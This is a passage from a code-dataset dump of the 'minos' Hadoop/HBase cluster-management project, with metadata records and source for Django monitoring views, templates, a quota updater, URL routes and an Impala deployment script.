ONLINE_METRICS_ENDPOINT_CONFIG['Online ' + access_type][label]\n metrics = []\n index = 0\n for name in metric_names:\n metric = []\n metric.append(titles[index])\n metric.append(name)\n metric.append(endpoints[index])\n metrics.append(metric)\n index = index + 1\n return metrics\n\n#url: /business/$id/$access_type/$label\ndef show_online(request, id, access_type, label):\n business = Business.objects.get(id=id)\n metrics = get_online_counters(access_type, label)\n\n params = {\n 'business_id' : id,\n 'write_menus' : ONLINE_METRICS_MENU_CONFIG['Online Write'],\n 'read_menus' : ONLINE_METRICS_MENU_CONFIG['Online Read'],\n 'metrics' : metrics,\n 'business': business,\n }\n return respond(request, 'business/online.html', params)\n"
},
{
"alpha_fraction": 0.6759259104728699,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 26,
"blob_id": "6da96e4d842f0260b285df5f7eff2651a995831b",
"content_id": "b7a19b2f0c7ecb5212c2da06c0729bed19c3c741",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 108,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 4,
"path": "/owl/quota_reportor.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nbin_path=`dirname $0`\ncd $bin_path\npython2.7 manage.py quota_reportor > quota_reportor.log 2>&1\n"
},
{
"alpha_fraction": 0.5115402936935425,
"alphanum_fraction": 0.5261422395706177,
"avg_line_length": 27.689189910888672,
"blob_id": "39ab9910fb702560ad56d977e04bd39d8a975446",
"content_id": "0ea403dc8c528c7379928be3d57bd54f338ae7fb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 2123,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 74,
"path": "/owl/failover_framework/templates/show_tasks.html",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% block content %}\n\n<h2 style=\"float:left\">Tasks</h2>\n<form action=\"/failover/task/\" method=\"get\" class=\"form-search\" style=\"float:right\">\n <input type=\"text\" name=\"start_time\" class=\"input-medium search-query\" placeholder=\"2013-09-12_11:10:30 ...\">\n <button type=\"submit\" class=\"btn\">Search Task</button>\n</form>\n\n<table class=\"table table-striped table-bordered\">\n <thead>\n <tr>\n <th>Start Time</th>\n <th>Action Number</th>\n <th>Cluster Healthy</th>\n <th>Data Consistent</th>\n <th>Action Success</th>\n </tr>\n </thead>\n <tbody>\n {% for task in tasks %}\n <tr>\n <td>{{task.start_time}}</td>\n <td>{{task.action_number}}</td>\n <td>\n {% if task.cluster_healthy == 1 %}\n <img src=\"{{ STATIC_URL }}/ok.png\" width=\"24\" alt=\"ok\"/>\n {% else %}\n <img src=\"{{ STATIC_URL }}/alert.png\" width=\"24\" alt=\"alert\"/>\n {% endif %}\n </td>\n <td>\n {% if task.data_consistent == 1 %}\n <img src=\"{{ STATIC_URL }}/ok.png\" width=\"24\" alt=\"ok\"/>\n {% else %}\n <img src=\"{{ STATIC_URL }}/alert.png\" width=\"24\" alt=\"alert\"/>\n {% endif %}\n </td>\n <td>\n {% for action in task.action_set.all %}\n {% if action.success == 1 %}\n <img src=\"{{ STATIC_URL }}/ok.png\" width=\"24\" alt=\"ok\"/>\n {% else %}\n <img src=\"{{ STATIC_URL }}/alert.png\" width=\"24\" alt=\"alert\"/>\n {% endif %}\n <a href=\"/failover/action/?start_time={{action.start_time}}\" title=\"Goto the action\">{{ action.name }}</a>\n <br/>\n {% endfor %}\n </td>\n {% endfor %}\n </tbody>\n</table>\n\n<div class=\"pagination\">\n <span class=\"step-links\">\n {% if tasks.has_previous %}\n <a href=\"?page={{ tasks.previous_page_number }}\">Previous</a>\n {% endif %}\n\n <span class=\"current\">\n Page {{ tasks.number }} of {{ tasks.paginator.num_pages }}\n </span>\n\n {% if tasks.has_next %}\n <a href=\"?page={{ tasks.next_page_number }}\">Next</a>\n {% endif %}\n </span>\n</div>\n\n<div align=\"right\"><a href=\"/failover/\">Back</a></div>\n\n\n{% endblock %}\n"
},
{
"alpha_fraction": 0.7166529297828674,
"alphanum_fraction": 0.7171230316162109,
"avg_line_length": 38.032108306884766,
"blob_id": "2678f5da855190a6e1f4539aac33b2edb4322d34",
"content_id": "0b4f87a3014f330016c18c2829b7c690c0289311",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8509,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 218,
"path": "/client/deploy_impala.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport parallel_deploy\nimport service_config\nimport subprocess\nimport sys\nimport urlparse\n\nimport deploy_utils\n\nfrom log import Log\n\nALL_JOBS = [\"statestored\", \"catalogd\", \"impalad\"]\n\ndef get_impala_service_config(args):\n args.impala_config = deploy_utils.get_service_config(args)\n\ndef generate_configs(args):\n core_site_xml = deploy_utils.generate_site_xml(args,\n args.impala_config.configuration.generated_files[\"core-site.xml\"])\n hdfs_site_xml = deploy_utils.generate_site_xml(args,\n args.impala_config.configuration.generated_files[\"hdfs-site.xml\"])\n hive_site_xml = deploy_utils.generate_site_xml(args,\n args.impala_config.configuration.generated_files[\"hive-site.xml\"])\n hbase_site_xml = deploy_utils.generate_site_xml(args,\n args.impala_config.configuration.generated_files[\"hbase-site.xml\"])\n\n config_files = {\n \"core-site.xml\": core_site_xml,\n \"hdfs-site.xml\": hdfs_site_xml,\n \"hive-site.xml\": hive_site_xml,\n \"hbase-site.xml\": hbase_site_xml,\n }\n config_files.update(args.impala_config.configuration.raw_files)\n\n return config_files\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"impala\", args.impala_config.cluster.name, job_name, instance_id=instance_id)\n job = args.impala_config.jobs[job_name]\n\n artifact_and_version = \"impala-\" + args.impala_config.cluster.version\n log_level = deploy_utils.get_service_log_level(args, args.impala_config)\n\n params = job.get_arguments(args, args.impala_config.cluster, args.impala_config.jobs,\n args.impala_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"ticket_cache\": \"$run_dir/impala.tc\",\n \"log_level\": log_level,\n \"params\": params,\n }\n\n return script_dict\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n \"%s/impala/start.sh.tmpl\" % deploy_utils.get_template_dir(),\n script_params)\n\ndef install(args):\n get_impala_service_config(args)\n deploy_utils.install_service(args, \"impala\", args.impala_config, \"impala\")\n\ndef cleanup_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n deploy_utils.cleanup_job(\"impala\", args.impala_config,\n host, job_name, instance_id, cleanup_token)\n\ndef cleanup(args):\n get_impala_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"impala\", args.impala_config)\n for job_name in args.job or ALL_JOBS:\n hosts = args.impala_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'cleanup', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(cleanup_job, task_list)\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n # parse the service_config according to the instance_id\n args.impala_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"impala\", \"impala\",\n args.impala_config, host, job_name, instance_id, cleanup_token, '0')\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n get_impala_service_config(args)\n cleanup_token = deploy_utils.confirm_bootstrap(\"impala\", args.impala_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.impala_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'bootstrap', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(bootstrap_job, task_list)\n\ndef start_job(args, host, job_name, host_id, instance_id, is_wait=False):\n if is_wait:\n deploy_utils.wait_for_job_stopping(\"impala\",\n args.impala_config.cluster.name, job_name, host, instance_id)\n\n # parse the service_config according to the instance_id\n args.impala_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n config_files = generate_configs(args)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.impala_config.jobs[job_name].base_port, instance_id)\n deploy_utils.start_job(args, \"impala\", \"impala\", args.impala_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n get_impala_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.impala_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'start')\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"impala\", args.impala_config, host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n get_impala_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.impala_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n get_impala_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.impala_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.impala_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'start', is_wait=True)\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef show_job(args, host, job_name, instance_id):\n deploy_utils.show_job(\"impala\", args.impala_config, host, job_name, instance_id)\n\ndef show(args):\n get_impala_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.impala_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'show')\n parallel_deploy.start_deploy_threads(show_job, task_list)\n\ndef run_shell(args):\n get_impala_service_config(args)\n\n os.environ['IMPALA_HOME'] = deploy_utils.get_root_dir(\"impala\")\n shell_script = \"%s/bin/impala-shell.sh\" % deploy_utils.get_root_dir(\"impala\")\n\n if not args.command:\n args.command.append(\"-h\")\n\n cmd = [\"bash\", shell_script] + args.command\n p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)\n p.wait()\n\ndef pack(args):\n get_impala_service_config(args)\n version = args.impala_config.cluster.version\n deploy_utils.make_package_dir(args, \"impala-shell\", args.impala_config.cluster)\n\n if not args.skip_tarball:\n deploy_utils.pack_package(args, \"impala-shell\",\n args.impala_config.cluster.version)\n Log.print_success(\"Pack client utilities for hadoop success!\\n\")\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n get_impala_service_config(args)\n job_name = args.job[0]\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.impala_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"impala\",\n args.impala_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"impala\",\n args.impala_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.7150042057037354,
"alphanum_fraction": 0.7150042057037354,
"avg_line_length": 40.13793182373047,
"blob_id": "a6c7530b71d4e15c9d0f95757605deeb29da0b81",
"content_id": "d0047fd242ff37381eebeb590170c9c91cc8de39",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1193,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 29,
"path": "/tank/tank/urls.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom package_server.views import check_package\nfrom package_server.views import get_latest_package_info\nfrom package_server.views import list_packages\nfrom package_server.views import upload_package\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'tank.views.home', name='home'),\n # url(r'^tank/', include('tank.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^$' , list_packages),\n url(r'^package_list/(\\d*)$', list_packages),\n url(r'^upload_package/$', upload_package),\n url(r'^check_package/$', check_package),\n url(r'^get_latest_package_info/$', get_latest_package_info),\n) + (static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT))\n"
},
{
"alpha_fraction": 0.681069016456604,
"alphanum_fraction": 0.6930957436561584,
"avg_line_length": 34.078125,
"blob_id": "68447f5e5cd6e47b70dd45ad64032401425c4de7",
"content_id": "465c31d289d403b8867c496e5559bae2f6e35c35",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2245,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 64,
"path": "/owl/utils/quota_util.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import datetime\nimport logging\nimport quota_injector\nimport time\nimport utils.hadoop_util\n\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom monitor.models import Cluster, Quota, Service\n\nlogger = logging.getLogger('quota')\nquota_injector = quota_injector.QuotaInjector()\n\nclass QuotaUpdater:\n \"\"\"Update path quota in hdfs\"\"\"\n\n def update_all_cluster(self):\n logger.info(\"start updating clusters quota\")\n self.start_time = time.time()\n hdfs_service = Service.objects.get(name='hdfs')\n for cluster in Cluster.objects.filter(active=True, service=hdfs_service).all():\n self.update_cluster(cluster)\n logger.info(\"spent %f seconds for updating clusters quota\",\n time.time() - self.start_time)\n\n @transaction.commit_on_success\n def update_cluster(self, cluster):\n logger.info(\"start update cluster %s\" % cluster.name),\n cluster_name = cluster.name\n now = time.time()\n quota_list = utils.hadoop_util.get_quota_summary(cluster_name)\n quota_injector.push_quota_to_tsdb(quota_list, cluster_name)\n for quota in quota_list:\n quota_record, ok = Quota.objects.get_or_create(cluster=cluster, name=quota['name'])\n quota_record.quota = quota['quota']\n quota_record.used_quota = quota['used_quota']\n quota_record.remaining_quota = quota['remaining_quota']\n quota_record.space_quota = quota['space_quota']\n quota_record.used_space_quota = quota['used_space_quota']\n quota_record.remaining_space_quota = quota['remaining_space_quota']\n quota_record.last_update_time = datetime.datetime.utcfromtimestamp(\n now).replace(tzinfo=timezone.utc)\n quota_record.save()\n logger.info(\"end update cluster %s\" % cluster.name),\n\ndef is_space_quota_healthy(total, used):\n try:\n # remaining < 1G or used ratio > 80% means not healthy\n if (int(total) - int(used)) < 1024*1024*1024 \\\n or float(used) / float(total) > 0.8:\n return False\n except Exception, e:\n pass\n return True\n\ndef is_name_quota_healthy(total, used):\n try:\n # remaining < 500 or used ratio > 80% means not healthy\n if (int(total) - int(used)) < 500\\\n or float(used) / float(total) > 0.8:\n return False\n except Exception, e:\n pass\n return True\n"
},
{
"alpha_fraction": 0.6774622201919556,
"alphanum_fraction": 0.678724467754364,
"avg_line_length": 34.92481994628906,
"blob_id": "f7bee049ec2e15dc5b8fe3faa1bf827e20b254de",
"content_id": "238b4c2ea323e875d4307a02d28f60876e8c4ff1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 30105,
"license_type": "permissive",
"max_line_length": 143,
"num_lines": 838,
"path": "/owl/monitor/views.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.conf import settings\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext, Context, loader\nfrom django.utils import timezone\nfrom django.http import HttpResponse\nfrom django.db import transaction\nfrom utils.quota_util import QuotaUpdater\n\nfrom models import Table\n\nimport datetime\nimport dbutil\nimport json\nimport logging\nimport metric_helper\nimport time\nimport owl_config\n\nlogger = logging.getLogger(__name__)\n\nclass Namespace:\n def __init__(self, **kwargs):\n for name, value in kwargs.iteritems():\n setattr(self, name, value)\n\n\ndef index(request):\n # show all cluster\n clusters = dbutil.get_clusters_by_service()\n service = Namespace(name=\"all services\")\n params = {\n 'service': service,\n 'clusters': clusters,\n }\n return respond(request, 'monitor/service.html', params)\n\n\n#url: /service/$id/\ndef show_service(request, id):\n service = dbutil.get_service(id)\n clusters = dbutil.get_clusters_by_service(id)\n params = {\n 'service': service,\n 'clusters': clusters,\n }\n if service.name == 'hbase':\n\n tsdb_read_query = []\n tsdb_write_query = []\n for cluster in clusters:\n tsdb_read_query.append(metric_helper.make_metric_query(cluster.name, 'Cluster', 'readRequestsCountPerSec'))\n tsdb_write_query.append(metric_helper.make_metric_query(cluster.name, 'Cluster', 'writeRequestsCountPerSec'))\n\n params.update({\n 'tsdb_read_query': tsdb_read_query,\n 'tsdb_write_query': tsdb_write_query,\n })\n\n return respond(request, 'monitor/hbase_service.html', params)\n else:\n return respond(request, 'monitor/service.html', params)\n\n#url: /cluster/$id/\ndef show_cluster(request, id):\n # return task board by default\n return redirect('/monitor/cluster/%s/task/' % id)\n\n#url: /cluster/$id/task/\ndef show_cluster_task_board(request, id):\n cluster = dbutil.get_cluster(id)\n tasks = dbutil.get_tasks_by_cluster(id)\n params = {'cluster': cluster,\n 'tasks': tasks}\n if cluster.service.name == 'hdfs':\n return respond(request, 'monitor/hdfs_task_board.html', params)\n elif cluster.service.name == 'hbase':\n return respond(request, 'monitor/hbase_task_board.html', params)\n elif cluster.service.name == 'storm':\n return respond(request, 'monitor/storm_task_board.html', params)\n else:\n return respond(request, 'monitor/cluster.html', params)\n\n#url: /cluster/$id/user/\ndef show_cluster_user_board(request, id):\n cluster = dbutil.get_cluster(id)\n if cluster.service.name == 'hdfs':\n return show_hdfs_user_board(request, cluster);\n # return empty paget for unsupported service\n return HttpResponse('')\n\n\ndef show_hdfs_user_board(request, cluster):\n if 'refresh' in request.GET:\n quota_updater = QuotaUpdater()\n quota_updater.update_cluster(cluster)\n return redirect('/monitor/cluster/%s/user/' % cluster.id)\n\n dirs = dbutil.get_quota_summary(cluster)\n params = {\n 'cluster': cluster,\n 'dirs': dirs,\n }\n return respond(request, 'monitor/hdfs_user_board.html', params)\n\n#url: /cluster/$id/table/\ndef show_cluster_table_board(request, id):\n cluster = dbutil.get_cluster(id)\n if cluster.service.name != 'hbase':\n # return empty paget for unsupported service\n return HttpResponse('')\n read_requests_dist_by_table, write_requests_dist_by_table = dbutil.get_requests_distribution_groupby(cluster, 'table');\n params = {\n 'chart_id': 'read_requests_on_table',\n 'chart_title': 'read requests on table',\n 'request_dist': read_requests_dist_by_table,\n 'base_url': '/monitor/table/',\n }\n\n read_requests_dist_by_table_chart = loader.get_template('monitor/requests_dist_pie_chart.tpl').render(Context(params))\n\n params = {\n 'chart_id': 'write_requests_on_table',\n 'chart_title': 'write requests on table',\n 'request_dist': write_requests_dist_by_table,\n 'base_url': '/monitor/table/',\n }\n write_requests_dist_by_table_chart = loader.get_template('monitor/requests_dist_pie_chart.tpl').render(\n Context(params))\n\n tables = dbutil.get_items_on_cluster(cluster, 'table', order_by='-qps')\n system_tables = [table for table in tables if is_system_table(table)]\n user_tables = [table for table in tables if not is_system_table(table)]\n\n table_read_item_keys = '|'.join(['%s-readRequestsCountPerSec' % (table.name) for table in user_tables])\n table_write_item_keys ='|'.join(['%s-writeRequestsCountPerSec' % (table.name) for table in user_tables])\n\n tsdb_read_query = []\n tsdb_write_query = []\n for table in user_tables:\n tsdb_read_query.append(metric_helper.make_metric_query(cluster.name, table.name, 'readRequestsCountPerSec'))\n tsdb_write_query.append(metric_helper.make_metric_query(cluster.name, table.name, 'writeRequestsCountPerSec'))\n\n params = {\n 'cluster': cluster,\n 'read_requests_dist_by_table_chart': read_requests_dist_by_table_chart,\n 'write_requests_dist_by_table_chart': write_requests_dist_by_table_chart,\n 'system_tables': system_tables,\n 'user_tables': user_tables,\n 'table_read_item_keys': table_read_item_keys,\n 'table_write_item_keys': table_write_item_keys,\n 'tsdb_read_query': tsdb_read_query,\n 'tsdb_write_query': tsdb_write_query,\n }\n return respond(request, 'monitor/hbase_table_board.html', params)\n\n#url: /cluster/$id/total/\ndef show_quota_total_board(request, id):\n cluster = dbutil.get_cluster(id)\n if cluster.service.name != 'hdfs':\n return HttpResponse('')\n\n tsdb_quota_total, tsdb_space_quota_total = dbutil.get_quota_distribution(cluster)\n params = {\n 'chart_id': 'used_quota_total',\n 'chart_title': 'total name quota on users',\n 'request_dist': tsdb_quota_total,\n 'base_url': '/monitor/user/',\n }\n tsdb_quota_total_chart = loader.get_template('monitor/requests_dist_pie_chart.tpl').render(Context(params))\n\n params = {\n 'chart_id': 'used_space_quota_total',\n 'chart_title': 'total used space on users',\n 'request_dist': tsdb_space_quota_total,\n 'base_url': '/monitor/user/',\n }\n tsdb_space_quota_total_chart = loader.get_template('monitor/requests_dist_pie_chart.tpl').render(Context(params))\n\n tsdb_quota_total_query = [metric_helper.make_quota_query(cluster.name, 'used_quota_total', 'used_quota')]\n tsdb_space_quota_total_query = [metric_helper.make_quota_query(cluster.name,\n 'used_space_quota_total', 'used_space_quota')]\n\n params = {\n 'cluster': cluster,\n 'tsdb_quota_total_chart': tsdb_quota_total_chart,\n 'tsdb_space_quota_total_chart': tsdb_space_quota_total_chart,\n 'tsdb_quota_total_query': tsdb_quota_total_query,\n 'tsdb_space_quota_total_query': tsdb_space_quota_total_query,\n }\n return respond(request, 'monitor/quota_total_board.html', params)\n\ndef is_system_table(table):\n system_table_names = ('-ROOT-', '.META.', '_acl_')\n return table.name in system_table_names\n\n#url: /cluster/$id/basic/\ndef show_cluster_basic_board(request, id):\n cluster = dbutil.get_cluster(id)\n if cluster.service.name != 'hbase':\n # return empty paget for unsupported service\n return HttpResponse('')\n\n basic_info = dbutil.get_hbase_basic_info(cluster)\n hdfs_cluster = dbutil.get_hdfs_cluster_by_name(cluster.name)\n\n group = 'Cluster'\n tsdb_read_query = [metric_helper.make_metric_query(cluster.name, group, 'readRequestsCountPerSec')]\n tsdb_write_query = [metric_helper.make_metric_query(cluster.name, group, 'writeRequestsCountPerSec')]\n\n params = {\n 'cluster': cluster,\n 'hdfs_cluster': hdfs_cluster,\n 'basic_info': basic_info,\n 'tsdb_read_query': tsdb_read_query,\n 'tsdb_write_query': tsdb_write_query,\n }\n return respond(request, 'monitor/hbase_basic_board.html', params)\n\n#url: /cluster/$id/regionserver/\ndef show_cluster_regionserver_board(request, id):\n cluster = dbutil.get_cluster(id)\n if cluster.service.name != 'hbase':\n # return empty paget for unsupported service\n return HttpResponse('')\n\n read_requests_dist_by_rs, write_requests_dist_by_rs = dbutil.get_requests_distribution_groupby(cluster, 'regionserver');\n params = {\n 'chart_id': 'read_requests_on_rs',\n 'chart_title': 'read requests on region server',\n 'request_dist': read_requests_dist_by_rs,\n 'base_url': '/monitor/regionserver/',\n }\n\n read_requests_dist_by_rs_chart = loader.get_template('monitor/requests_dist_pie_chart.tpl').render(Context(params))\n\n params = {\n 'chart_id': 'write_requests_on_rs',\n 'chart_title': 'write requests on region server',\n 'request_dist': write_requests_dist_by_rs,\n 'base_url': '/monitor/regionserver/',\n }\n write_requests_dist_by_rs_chart = loader.get_template('monitor/requests_dist_pie_chart.tpl').render(Context(params))\n\n regionservers = dbutil.get_items_on_cluster(cluster, 'regionserver', order_by='name')\n params = {\n 'cluster': cluster,\n 'read_requests_dist_by_rs_chart': read_requests_dist_by_rs_chart,\n 'write_requests_dist_by_rs_chart': write_requests_dist_by_rs_chart,\n 'regionservers': regionservers,\n }\n return respond(request, 'monitor/hbase_regionserver_board.html', params)\n\n#url: /cluster/$id/replication/\ndef show_cluster_replication(request, id):\n cluster = dbutil.get_cluster(id)\n region_servers = dbutil.get_regionservers_with_active_replication_metrics_by_cluster(cluster) \n (peer_id_endpoint_map, peer_id_cluster_map) = metric_helper.get_peer_id_endpoint_map_and_cluster(region_servers)\n params = {\n 'cluster' : cluster,\n 'replication_metrics' : metric_helper.make_metrics_query_for_replication(peer_id_endpoint_map, peer_id_cluster_map),\n }\n return respond(request, 'monitor/hbase_replication.html', params)\n\n#url: /cluster/$id/?type=\"spout or bolt\"\ndef show_cluster_storm_builtin_metrics(request, id):\n cluster = dbutil.get_cluster(id)\n storm_tasks = dbutil.get_storm_task_by_cluster(cluster)\n type = request.GET.get('type')\n type_dict = {\n \"Spout\": \"STORM_BUILTIN_SPOUT_METRICS\",\n \"Bolt\": \"STORM_BUILTIN_BOLT_METRICS\",\n }\n\n # builtin metrics format is <storm_id, STORM_BUILTIN_SPOUT_METRICS|STORM_BUILTIN_BOLT_METRICS, <key, value>>>\n storm_metrics = [];\n for storm_task in storm_tasks:\n if storm_task.job.name != 'metricserver':\n continue\n try:\n json_metrics = json.loads(storm_task.last_metrics_raw)\n except:\n logger.warning(\"Failed to parse metrics of task: %s\", storm_task)\n return HttpResponse('')\n\n for storm_id, topology_metrics in json_metrics.iteritems():\n element = {\"storm_id\": storm_id}\n for group_name, group_metrics in topology_metrics.iteritems():\n if group_name == type_dict.get(type):\n for metrics_name, metrics in group_metrics.iteritems():\n metrics_name = metrics_name.lstrip('_')\n metrics_name = metrics_name.replace('-', '_')\n element[metrics_name] = metrics\n storm_metrics.append(element)\n\n params = {\n 'cluster' : cluster,\n 'storm_metrics' : storm_metrics,\n }\n\n if type == \"Spout\":\n return respond(request, 'monitor/storm_spout_board.html', params)\n elif type == \"Bolt\":\n return respond(request, 'monitor/storm_bolt_board.html', params)\n else:\n return HttpResponse('Unsupported type: ' + type)\n\n#url: /cluster/$id/system_metrics/\ndef show_cluster_storm_system_metrics(request, id):\n cluster = dbutil.get_cluster(id)\n storm_tasks = dbutil.get_storm_task_by_cluster(cluster)\n\n # system metrics format is <storm_id, STORM_SYSTEM_*, <key, value>>>;\n # and key may in format: \"GC/*\", \"memory/heap:*\", \"\"memory/nonHeap:*\" or \".*\";\n storm_metrics = []\n for storm_task in storm_tasks:\n try:\n json_metrics = json.loads(storm_task.last_metrics_raw)\n except:\n logger.warning(\"Failed to parse metrics of task: %s\", storm_task.last_metrics_raw)\n return HttpResponse('')\n\n for storm_id, topology_metrics in json_metrics.iteritems():\n topology_element = []\n for group_name, group_metrics in topology_metrics.iteritems():\n if group_name.find(\"STORM_SYSTEM_\") != 0:\n continue\n group_name = group_name.lstrip(\"STORM_SYSTEM_\")\n element = {\"worker_endpoint\" : group_name};\n gc_value = \"\"\n memory_heap_value = \"\"\n memory_non_heap_value = \"\"\n for metrics_name, metrics in group_metrics.iteritems():\n if metrics_name.find(\"GC/\") == 0:\n if len(gc_value) != 0:\n gc_value += \", \\n\"\n gc_value += metrics_name.lstrip(\"GC/\") + \":\" + str(metrics)\n\n if metrics_name.find(\"memory/heap:\") == 0:\n if len(memory_heap_value) != 0:\n memory_heap_value += \", \\n\"\n memory_heap_value += metrics_name.lstrip(\"memory/heap:\") + \":\" + str(metrics)\n\n if metrics_name.find(\"memory/nonHeap:\") == 0:\n if len(memory_non_heap_value) != 0:\n memory_non_heap_value += \", \\n\"\n memory_non_heap_value += metrics_name.lstrip(\"memory/nonHeap:\") + \":\" + str(metrics)\n\n if metrics_name == \"startTimeSecs\":\n element[\"start_time_sec\"] = metrics\n if metrics_name == \"uptimeSecs\":\n element[\"uptime_sec\"] = metrics\n element[\"GC\"] = gc_value\n element[\"memory_heap\"] = memory_heap_value\n element[\"memory_non_heap\"] = memory_non_heap_value\n topology_element.append(element)\n\n metrics = {\n \"storm_id\" : storm_id,\n \"topology_metrics\" : topology_element\n }\n storm_metrics.append(metrics)\n\n params = {\n 'cluster' : cluster,\n 'storm_metrics' : storm_metrics,\n }\n\n return respond(request, 'monitor/storm_system_metrics_board.html', params)\n\n#url: /cluster/$id/user_metrics/\ndef show_cluster_storm_user_metrics(request, id):\n cluster = dbutil.get_cluster(id)\n storm_tasks = dbutil.get_storm_task_by_cluster(cluster)\n\n # user metrics format is <storm_id, component_id:task_id, <key, value>>>;\n storm_metrics = {}\n for storm_task in storm_tasks:\n if storm_task.job.name != 'metricserver':\n continue\n try:\n json_metrics = json.loads(storm_task.last_metrics_raw)\n except:\n logger.warning(\"Failed to parse metrics of task: %s\", storm_task)\n return HttpResponse('')\n\n for storm_id, topology_metrics in json_metrics.iteritems():\n topology_metrics_dict = 